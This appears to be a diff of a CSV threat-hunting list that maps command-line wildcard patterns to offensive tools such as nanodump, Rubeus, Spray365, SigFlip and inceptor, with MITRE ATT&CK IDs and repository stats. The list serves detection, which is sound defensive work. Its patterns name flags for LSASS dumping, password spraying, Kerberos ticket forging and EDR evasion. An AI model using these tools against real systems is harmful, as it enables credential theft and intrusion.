exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --shellcode *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "* --shellcode *--dc-ip *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --shellcode *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --shellcode --remoteinject*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --show_invalid_creds*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* Sigwhatever*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* --silent -obf NixImports -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --silent-process-exit *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* silenttrinity.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
